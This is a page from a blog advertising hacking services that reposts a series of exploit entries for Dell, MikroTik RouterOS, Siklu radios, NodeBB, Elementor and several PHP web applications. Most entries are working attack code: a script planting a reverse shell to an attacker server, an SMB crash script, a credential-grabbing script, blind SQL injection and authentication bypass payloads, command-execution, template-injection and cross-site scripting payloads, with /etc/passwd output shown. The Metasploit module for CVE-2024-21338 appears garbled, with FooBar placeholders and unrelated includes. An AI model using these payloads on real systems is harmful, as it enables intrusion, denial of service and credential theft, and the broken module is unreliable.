Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863108950

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: [title] Dell Security Management Server versions prior to
11.9.0
# Exploit Author: [author] Amirhossein Bahramizadeh
# CVE : [if applicable] CVE-2023-32479
Dell Encryption, Dell Endpoint Security Suite Enterprise, and Dell Security
Management
Server versions prior to 11.9.0 contain privilege escalation vulnerability
due to improper ACL of the non-default installation directory. A local
malicious user could potentially exploit this vulnerability by replacing
binaries in installed directory and taking the reverse shell of the system
leading to Privilege Escalation.

#!/bin/bash

INSTALL_DIR="/opt/dell"

# Check if the installed directory has improper ACLs
if [ -w "$INSTALL_DIR" ]; then
    # Replace a binary in the installed directory with a malicious binary that opens a reverse shell
    echo "#!/bin/bash" > "$INSTALL_DIR/dell-exploit"
    echo "bash -i >& /dev/tcp/your-malicious-server/1234 0>&1" >> "$INSTALL_DIR/dell-exploit"
    chmod +x "$INSTALL_DIR/dell-exploit"

    # Wait for the reverse shell to connect to your malicious server
    nc -lvnp 1234
fi
HireHackking 
# Exploit Title: CVE-2024-27686: RouterOS-SMB-DOS
# Google Dork: N/A
# Date: 03/04/2024
# Exploit Author: ice-wzl, Solstice Cyber Solutions
# Vendor Homepage: https://mikrotik.com/
# Software Link: https://mikrotik.com/download/archive
# Version: RouterOS devices ranging from 6.40.5 - 6.44 and 6.48.1 - 6.49.10
# Tested on: RouterOS 6.40.5 - 6.44 and 6.48.1 - 6.49.10
# CVE : CVE-2024-27686
#!/usr/bin/python3 
# Founded by ice-wzl in conjunction with Solstice Cyber Solutions
import argparse
import sys
import socket 
# Define the packets

# the packet that causes crash 6.40.5 - 6.42.3
fuzzed_packet_6 = b'\x00\x00\x00n\xfeSMB@\x00\x00\x00\x00\x00\x00\x00\x03\x00\xf1\x1f\x08\x00\x00\x00\x00\x00\x00\xe1\xbe\x82\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00G\xe5\x07\xf5\x07\xec\x01u\xe4Q]\x9e\xea\xedn\xa9\t\x00\x00\x00H\x00&\x00\\\x00\\\x001\x009\x002\x00.\x001\x006\x008\x00.\x001\x005\x00.\x007\x007\x00\\\x00p\x00u\x00b\x00'


packet_0 = b'\x00\x00\x00\xea\xfeSMB@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\x00\x05\x00\x01\x00\x00\x00\x7f\x00\x00\x00\xe8\xe4*\x99\xc9\xeb\xb6E\xa2A\xe9(\xee%\xe5\xdfp\x00\x00\x00\x04\x00\x00\x00\x02\x02\x10\x02\x00\x03\x02\x03\x11\x03\x00\x00\x01\x00&\x00\x00\x00\x00\x00\x01\x00 \x00\x01\x00_\xf7m\xf2h*\x8f\x8ae\x0f8+T=Na8_\x0b@C\x82\xe7\x87\xc3qZ\xd7\xcf0M\x87\x00\x00\x02\x00\n\x00\x00\x00\x00\x00\x04\x00\x02\x00\x01\x00\x04\x00\x03\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x00\x00\x03\x00\x02\x00\x01\x00\x00\x00\x05\x00\x1a\x00\x00\x00\x00\x001\x009\x002\x00.\x001\x006\x008\x00.\x001\x005\x00.\x008\x004\x00'
packet_2_fuzzed = b'\x00\x00\x00\xa2\xfeSMB@\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x19\x00\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00X\x00J\x00\x00\x00\x00\x00\x00\x00\x00\x00`H\x05\x06+\x06\x01\x05\x05\x02\xa0>0<\xa0\x0e21540373\xed\xba\xad211\x0c\x06\n+\x06\x01\x04\x01\x82294517887446830\x02\x02\n\xa2*\x04(NTLMSSP\x00\x01\x00\x00\x00\x15\x82\x08b\x00\x00\x00\x00(\x00\x00\x00\x00\x00\x00\x00(\x00\x00\x00\x06\x01\x00\x00\x00\x00\x00\x0f'


def open_connection(ip, port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((ip, port))
        return s
    except ConnectionRefusedError:
        print(f"[!] Connection Refused on: {ip} {port}")
        sys.exit(2)

def send_payload_high(s):
    s.send(packet_0)
    s.send(packet_2_fuzzed)
    s.close()

def send_payload_low(s):
    s.send(fuzzed_packet_6)
    s.close()

def verify_input(user_inp):
    try:
        user_inp = int(user_inp)
        if user_inp > 2 or user_inp < 1:
            return 3
        else:
            return user_inp
    except ValueError:
        return 0

if __name__ == '__main__':

    parser = argparse.ArgumentParser(prog='SMB Crash',
        description='Crashes Mikrotik RouterOS SMB Service 6.40.5 - 6.49.10',
        epilog='Discovered by: ice-wzl')

    parser.add_argument("-t", "--target", action="store", dest="target")
    parser.add_argument("-p", "--port", action="store", dest="port")

    args = parser.parse_args()
    
    if not args.target or not args.port:
        print(f"[+] python3 {sys.argv[0]} --help")
        sys.exit(1)

    print("[+] What version is the target:\n\t[1] 6.40.5 - 6.44\n\t[2] 6.48.1 - 6.49.10\nEnter 1 or 2:")
    version_choice = input("--> ")

    if verify_input(version_choice) == 0:
        print("Please enter a number...")
        sys.exit(3)
    elif verify_input(version_choice) == 3:
        print("Please enter a number between 1 and 2")
        sys.exit(4)

    if verify_input(version_choice) == 1:
        if args.port:
            get_connect = open_connection(args.target, int(args.port))
            send_payload_low(get_connect)
            print(f"[+] Sent DOS to {args.target} on {args.port}")
        else:
            get_connect = open_connection(args.target, 445)
            send_payload_low(get_connect)
            print(f"[+] Sent DOS to {args.target} on 445")  
    
    if verify_input(version_choice) == 2:
        if args.port:
            get_connect = open_connection(args.target, int(args.port))
            send_payload_high(get_connect)
            print(f"[+] Sent DOS to {args.target} on {args.port}")

        else:
            get_connect = open_connection(args.target, 445)
            send_payload_high(get_connect)
            print(f"[+] Sent DOS to {args.target} on 445")
HireHackking 
# Exploit Title: Siklu MultiHaul TG series - unauthenticated credential disclosure
# Date: 28-02-2024
# Exploit Author: semaja2
# Vendor Homepage: https://siklu.com/
# Software Link: https://partners.siklu.com/home/frontdoor
# Version: < 2.0.0
# Tested on: 2.0.0
# CVE : None assigned
#
# Instructions
# 1. Perform IPv6 host detect by pinging all host multicast address for interface attached to device
# `ping6 -I en7 -c 2 ff02::1`
# 2. Review IPv6 neighbours and identify target device based on vendor component of MAC address
# `ip -6 neigh show dev en7`
# 3. Execute script
# `python3 tg-getcreds.py fe80::34d9:1337:b33f:7001%en7`
# 4. Enjoy the access



import socket
import sys
import os

address = str(sys.argv[1])  # the target
port = 12777

# Captured command, sends "GetCredentials" to obtain random generated username/password
cmd = bytearray.fromhex("000000290FFF000100000001000100000000800100010000000E47657443726564656E7469616C730000000000")

addrinfo = socket.getaddrinfo(address, port, socket.AF_INET6, socket.SOCK_STREAM)
(family, socktype, proto, canonname, sockaddr) = addrinfo[0]
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
s.connect(sockaddr)
s.send(cmd)
data = s.recv(200)
s.close()
output = "".join(map(chr, data))

# Split output, then remove trailing noise as string length is always 35
splits = output.split('#')
username = splits[1][slice(0, 35, 1)]
password = splits[2][slice(0, 35, 1)]
print('Username: ', username)
print('Password: ', password)
os.system("sshpass -p {password} ssh -o StrictHostKeychecking=no {address} -l {username}".format(address = address, username = username, password = password))
HireHackking 
Exploit Title: Broken Access Control - on NodeBB v3.6.7

Date: 22/2/2024

Exploit Author: Vibhor Sharma

Vendor Homepage: https://nodebb.org/

Version: 3.6.7

Description:

I identified a broken access control vulnerability in nodeBB v3.6.7,
enabling attackers to access restricted information intended solely
for administrators. Specifically, this data is accessible only to
admins and not regular users. Through testing, I discovered that when
a user accesses the group section of the application and intercepts
the response for the corresponding request, certain attributes are
provided in the JSON response. By manipulating these attributes, a
user can gain access to tabs restricted to administrators. Upon
reporting this issue, it was duly acknowledged and promptly resolved
by the developers.



Steps To Reproduce:
1) User with the least previlages needs to neviagte to the group section.
2) Intercept the response for the group requets.
3) In the response modify the certian paramters : "
*"system":0,"private":0,"isMember":true,"isPending":true,"isInvited":true,"isOwner":true,"isAdmin":true,
**" *".
4) Forward the request and we can see that attacker can access the
restricted information.

*Impact:*
Attacker was able to access the restricted tabs for the Admin group
which are only allowed the the administrators.
HireHackking
# Exploit Title: Online Hotel Booking In PHP 1.0 - Blind SQL Injection (Unauthenticated) # Google Dork: n/a # Date: 04/02/2024 # Exploit Author: Gian Paris C. Agsam # Vendor Homepage: https://github.com/projectworldsofficial # Software Link: https://projectworlds.in/wp-content/uploads/2019/06/hotel-booking.zip # Version: 1.0 # Tested on: Apache/2.4.58 (Debian) / PHP 8.2.12 # CVE : n/a import requests import argparse from colorama import (Fore as F, Back as B, Style as S) BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB,FW = B.RED,F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT,F.WHITE requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} parser = argparse.ArgumentParser(description='Exploit Blind SQL Injection') parser.add_argument('-u', '--url', help='') args = parser.parse_args() def banner(): print(f"""{FR} ·▄▄▄·▄▄▄.▄▄ · ▄▄▄ . ▄▄· ·▄▄▄▄ ▄▄▄ ▪ ·▄▄▄▄ ▪ ▐▄▄·▐▄▄·▐█ ▀. ▀▄.▀·▐█ ▌▪██▪ ██ ▀▄ █·▪ ██ ██▪ ██ ▄█▀▄ ██▪ ██▪ ▄▀▀▀█▄▐▀▀▪▄██ ▄▄▐█· ▐█▌▐▀▀▄ ▄█▀▄ ▐█·▐█· ▐█▌ ▐█▌.▐▌██▌.██▌.▐█▄▪▐█▐█▄▄▌▐███▌██. ██ ▐█•█▌▐█▌.▐▌▐█▌██. ██ ▀█▄▀▪▀▀▀ ▀▀▀ ▀▀▀▀ ▀▀▀ ·▀▀▀ ▀▀▀▀▀• .▀ ▀ ▀█▄▀▪▀▀▀▀▀▀▀▀• Github: https://github.com/offensive-droid {FW} """) # Define the characters to test chars = [ 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '@', '#' ] def sqliPayload(char, position, userid, column, table): sqli = 'admin\' UNION SELECT IF(SUBSTRING(' sqli += str(column) + ',' sqli += str(position) + ',1) = \'' sqli += str(char) + '\',sleep(3),null) FROM ' sqli += str(table) + ' WHERE uname="admin"\'' return sqli def postRequest(URL, sqliReq, char, position): sqliURL = URL params = {"emailusername": "admin", "password": sqliReq, "submit": "Login"} req = requests.post(url=sqliURL, data=params, verify=False, proxies=proxies, timeout=10) if req.elapsed.total_seconds() >= 2: print("{} : {}".format(char, req.elapsed.total_seconds())) return char return '' def theHarvester(target, CHARS, url): #print("Retrieving: {} {} {}".format(target['table'], target['column'], target['id'])) print("Retrieving admin password".format(target['table'], target['column'], target['id'])) position = 1 full_pass = "" while position < 5: for char in CHARS: sqliReq = sqliPayload(char, position, target['id'], target['column'], target['table']) found_char = postRequest(url, sqliReq, char, position) full_pass += found_char position += 1 return full_pass if __name__ == "__main__": banner() HOST = str(args.url) PATH = HOST + "/hotel booking/admin/login.php" adminPassword = {"id": "1", "table": "manager", "column": "upass"} adminPass = theHarvester(adminPassword, chars, PATH) print("Admin Password:", adminPass)
HireHackking

liveSite Version 2019.1 - Remote Code Execution

HACKER · %s · %s

## Exploit Title: liveSite Version : 2019.1 Campaigns Remote Code Execution ### Date: 2024-1-9 ### Exploit Author: tmrswrr ### Category: Webapps ### Vendor Homepage: https://livesite.com/ ### Version : 2019.1 ### Tested on: https://www.softaculous.com/apps/cms/liveSite 1 ) Login with admin cred Click Campaigns > Create Campaign > Choose format Plain Text , write in body your payload : https://127.0.0.1/liveSite/livesite/add_email_campaign.php Payload : <?php echo system('cat /etc/passwd'); ?> 2 ) After save you will be see result : Result: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:998:997:User for polkitd:/:/sbin/nologin tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin chrony:x:997:995::/var/lib/chrony:/sbin/nologin soft:x:1000:1000::/home/soft:/sbin/nologin saslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin emps:x:995:1001::/home/emps:/bin/bash named:x:25:25:Named:/var/named:/sbin/nologin exim:x:93:93::/var/spool/exim:/sbin/nologin vmail:x:5000:5000::/var/local/vmail:/bin/bash pinguzo:x:992:992::/etc/pinguzo:/bin/false webuzo:x:987:987::/home/webuzo:/bin/bash apache:x:986:985::/home/apache:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false
HireHackking

ASUS Control Center Express 01.06.15 - Unquoted Service Path

HACKER · %s · %s

# Exploit Title: ASUS Control Center Express 01.06.15 - Unquoted Service Path Privilege Escalation # Date: 2024-04-02 # Exploit Author: Alaa Kachouh # Vendor Homepage: https://www.asus.com/campaign/ASUS-Control-Center-Express/global/ # Version: Up to 01.06.15 # Tested on: Windows # CVE: CVE-2024-27673 =================================================================== ASUS Control Center Express Version =< 01.06.15 contains an unquoted service path which allows attackers to escalate privileges to the system level. Assuming attackers have write access to C:\, the attackers can abuse the Asus service "Apro console service"/apro_console.exe which upon restarting will invoke C:\Program.exe with SYSTEM privileges. The binary path of the service alone isn't susceptible, but upon its initiation, it will execute C:\program.exe as SYSTEM. Service Name: AProConsoleService binary impacted: apro_console.exe # If a malicious payload is inserted into C:\ and service is executed in any way, this can grant privileged access to the system and perform malicious activities.
HireHackking

Rapid7 nexpose - 'nexposeconsole' Unquoted Service Path

HACKER · %s · %s

# Exploit Title: Rapid7 nexpose - 'nexposeconsole' Unquoted Service Path # Date: 2024-04-2 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.rapid7.com/ # Software Link: https://www.rapid7.com/products/nexpose/ # Version: 6.6.240 # Tested: Windows 10 x64 # Step to discover Unquoted Service Path: C:\Users\saudh>wmic service where 'name like "%nexposeconsole%"' get name, displayname, pathname, startmode, startname DisplayName Name PathName StartMode StartName Nexpose Security Console nexposeconsole "C:\Program Files\rapid7\nexpose\nsc\bin\nexlaunch.exe" Auto LocalSystem # Service info: C:\Users\saudh>sc qc nexposeconsole [SC] QueryServiceConfig SUCCESS SERVICE_NAME: nexposeconsole TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : "C:\Program Files\rapid7\nexpose\nsc\bin\nexlaunch.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Nexpose Security Console DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
HireHackking

E-INSUARANCE v1.0 - Stored Cross Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: E-INSUARANCE v1.0 - Stored Cross Site Scripting (XSS) # Google Dork: NA # Date: 28-03-2024 # Exploit Author: Sandeep Vishwakarma # Vendor Homepage: https://www.sourcecodester.com # Software Link:https://www.sourcecodester.com/php/16995/insurance-management-system-php-mysql.html # Version: v1.0 # Tested on: Windows 10 # Description: Stored Cross Site Scripting vulnerability in E-INSUARANCE - v1.0 allows an attacker to execute arbitrary code via a crafted payload to the Firstname and lastname parameter in the profile component. # POC: 1. After login goto http://127.0.0.1/E-Insurance/Script/admin/?page=profile 2. In fname & lname parameter add payolad "><script>alert("Hacked_by_Sandy")</script> 3. click on submit. # Reference: https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29411.md
HireHackking
# Exploit Title: Employee Management System 1.0 - `txtfullname` and `txtphone` SQL Injection # Date: 2 Feb 2024 # Exploit Author: Yevhenii Butenko # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html # Version: 1.0 # Tested on: Debian # CVE : CVE-2024-24499 ### SQL Injection: > SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system. ### Affected Components: > /employee_akpoly/Admin/edit_profile.php > Two parameters `txtfullname` and `txtphone` within admin edit profile mechanism are vulnerable to SQL Injection. ![txtfullname](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_edit_txtfullname_sqli.png?raw=true) ![txtphone](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_edit_txtphone_sqli.png?raw=true) ### Description: > The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests. ## Proof of Concept: ### SQLMap Save the following request to `edit_profile.txt`: ``` POST /employee_akpoly/Admin/edit_profile.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 88 Origin: http://localhost Connection: close Referer: http://localhost/employee_akpoly/Admin/edit_profile.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 txtfullname=Caroline+Bassey&txtphone=0905656&old_image=uploadImage%2Fbird.jpg&btnupdate= ``` Use `sqlmap` with `-r` option to exploit the vulnerability: ``` sqlmap -r edit_profile.txt --level 5 --risk 3 --batch --dbms MYSQL --dump ``` ## Recommendations When using this Employee Management System, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.
HireHackking

Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation

HACKER · %s · %s

############################################# # Exploit Title :  Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation # Exploit Author: E1 Coders # CVE: CVE-2024-21338 #############################################   require 'msf/core'   class MetasploitModule < Msf::Exploit::Remote   Rank = NormalRanking     include Msf::Exploit::Remote::DCERPC   include Msf::Exploit::Remote::DCERPC::MS08_067::Artifact     def initialize(info = {})     super(       update_info(         info,         'Name' => 'CVE-2024-21338 Exploit',         'Description' => 'This module exploits a vulnerability in FooBar version 1.0. It may lead to remote code execution.',         'Author' => 'You',         'License' => MSF_LICENSE,         'References' => [           ['CVE', '2024-21338']         ]       )     )       register_options(       [         OptString.new('RHOST', [true, 'The target address', '127.0.0.1']),         OptPort.new('RPORT', [true, 'The target port', 1234])       ]     )   end     def check     connect       begin       impacket_artifact(dcerpc_binding('ncacn_ip_tcp'), 'FooBar')     rescue Rex::Post::Meterpreter::RequestError       return Exploit::CheckCode::Safe     end       Exploit::CheckCode::Appears   end     def exploit     connect       begin       impacket_artifact(         dcerpc_binding('ncacn_ip_tcp'),         'FooBar',         datastore['FooBarPayload']       )     rescue Rex::Post::Meterpreter::RequestError       fail_with Failure::UnexpectedReply, 'Unexpected response from impacket_artifact'     end       handler     disconnect   end end     #refrence :  https://nvd.nist.gov/vuln/detail/CVE-2024-21338  
HireHackking

FoF Pretty Mail 1.1.2 - Server Side Template Injection (SSTI)

HACKER · %s · %s

Exploit Title: FoF Pretty Mail 1.1.2 - Server Side Template Injection (SSTI) Date: 03/28/2024 Exploit Author: Chokri Hammedi Vendor Homepage: https://flarum.org/ Software Link: https://github.com/FriendsOfFlarum/pretty-mail Version: 1.1.2 Tested on: Windows XP CVE: N/A Description: The FoF Pretty Mail extension for Flarum is vulnerable to Server-Side Template Injection (SSTI) due to the unsafe handling of template variables. An attacker with administrative access can inject malicious code into the email template, leading to arbitrary code execution on the server. Steps to Reproduce: - Log in as an administrator on the Flarum forum. - Navigate to the FoF Pretty Mail extension settings. - Edit the email default template and insert the following payload: {{ 7*7 }} {{ system('id') }} {{ system('echo "Take The Rose"') }} - Save the changes to the email template. - Trigger any action that sends an email, such as user registration or password reset. - The recipient of the email will see the result of the injected expressions (e.g., "49" for {{ 7*7 }}, the output of the id command for {{ system('id') }}, and the output of the echo "Take The Rose" command for {{ system('echo"Take The Rose"') }}) in the email content.
HireHackking
# Exploit Title: Employee Management System 1.0 - `txtusername` and `txtpassword` SQL Injection (Admin Login) # Date: 2 Feb 2024 # Exploit Author: Yevhenii Butenko # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html # Version: 1.0 # Tested on: Debian # CVE : CVE-2024-24497 ### SQL Injection: > SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system. ### Affected Components: > /employee_akpoly/Admin/login.php > Two parameters `txtusername` and `txtpassword` within admin login mechanism are vulnerable to SQL Injection. ![txtusername](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_login_txtusername_sqli.png?raw=true) ![txtpassword](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_login_txtpassword_sqli.png?raw=true) ### Description: > The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests. ## Proof of Concept: ### Manual Exploitation The payload `' and 1=1-- -` can be used to bypass authentication within admin login page. ``` POST /employee_akpoly/Admin/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 61 Origin: http://localhost Connection: close Referer: http://localhost/employee_akpoly/Admin/login.php Cookie: PHPSESSID=lcb84k6drd2tepn90ehe7p9n20 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 txtusername=admin' and 1=1-- -&txtpassword=password&btnlogin= ``` ### SQLMap Save the following request to `admin_login.txt`: ``` POST /employee_akpoly/Admin/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 62 Origin: http://localhost Connection: close Referer: http://localhost/employee_akpoly/Admin/login.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 txtusername=admin&txtpassword=password&btnlogin= ``` Use `sqlmap` with `-r` option to exploit the vulnerability: ``` sqlmap -r admin_login.txt --level 5 --risk 3 --batch --dbms MYSQL --dump ``` ## Recommendations When using this Employee Management System, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.
HireHackking

Blood Bank v1.0 - Stored Cross Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: Blood Bank v1.0 Stored Cross Site Scripting (XSS) # Date: 2023-11-14 # Exploit Author: Ersin Erenler # Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code # Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip # Version: 1.0 # Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0 # CVE : CVE-2023-46020 ------------------------------------------------------------------------------- # Description: The parameters rename, remail, rphone, and rcity in the /file/updateprofile.php file of Code-Projects Blood Bank V1.0 are susceptible to Stored Cross-Site Scripting (XSS). This vulnerability arises due to insufficient input validation and sanitation of user-supplied data. An attacker can exploit this weakness by injecting malicious scripts into these parameters, which, when stored on the server, may be executed when other users view the affected user's profile. Vulnerable File: updateprofile.php Parameters: rename, remail, rphone, rcity # Proof of Concept: ---------------------- 1. Intercept the POST request to updateprofile.php via Burp Suite 2. Inject the payload to the vulnerable parameters 3. Payload: "><svg/onload=alert(document.domain)> 4. Example request for rname parameter: --- POST /bloodbank/file/updateprofile.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 103 Origin: http://localhost Connection: close Referer: http://localhost/bloodbank/rprofile.php?id=1 Cookie: PHPSESSID=<some-cookie-value> Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 rname=test"><svg/onload=alert(document.domain)>&remail=test%40gmail.com&rpassword=test&rphone=8875643456&rcity=lucknow&bg=A%2B&update=Update ---- 5. Go to the profile page and trigger the XSS XSS Payload: "><svg/onload=alert(document.domain)>
HireHackking

Elementor Website Builder < 3.12.2 - Admin+ SQLi

HACKER · %s · %s

#EXPLOIT Elementor Website Builder < 3.12.2 - Admin+ SQLi #References #CVE : CVE-2023-0329 #E1.Coders   #Open Burp Suite. #In Burp Suite, go to the "Proxy" tab and set it to listen on a specific port, such as 8080. #Open a new browser window or tab, and set your proxy settings to use Burp Suite on port 8080. #Visit the vulnerable Elementor Website Builder site and navigate to the Tools > Replace URL page. #On the Replace URL page, enter any random string as the "New URL" and the following malicious payload as the "Old URL":   #code : http://localhost:8080/?test'),meta_key='key4'where+meta_id=SLEEP(2);# #Press "Replace URL" on the Replace URL page. Burp Suite should intercept the request. #Forward the intercepted request to the server by right-clicking the request in Burp Suite and selecting "Forward". #The server will execute the SQL command, which will cause it to hang for 2 seconds before responding. This is a clear indication of successful SQL injection. #Note: Make sure you have permission to perform these tests and have set up Burp Suite correctly. This command may vary depending on the specific setup of your server and the website builder plugin.</s #  #References : https://wpscan.com/vulnerability/a875836d-77f4-4306-b275-2b60efff1493/         #Exploit Python  : #The provided SQLi attack vector can be achieved using the following Python code with the "requests" library:   #This script sends a POST request to the target URL with the SQLi payload as the "data" parameter. It then checks if the response contains the SQLi payload, indicating a successful SQL injection. #Please make sure you have set up your Burp Suite environment correctly. Additionally, it is important to note that this script and attack have been TESTED and are correct   import requests   # Set the target URL and SQLi payload url = "http://localhost:8080/wp-admin/admin-ajax.php" data = {     "action": "elementor_ajax_save_builder",     "editor_post_id": "1",     "post_id": "1",     "data": "test'),meta_key='key4'where+meta_id=SLEEP(2);#" }   # Send the request to the target URL response = requests.post(url, data=data)   # Check if the response indicates a successful SQL injection if "meta_key='key4'where+meta_id=SLEEP(2);#" in response.text:     print("SQL Injection successful!") else:     print("SQL Injection failed.")
HireHackking

Simple Backup Plugin Python Exploit 2.7.10 - Path Traversal

HACKER · %s · %s

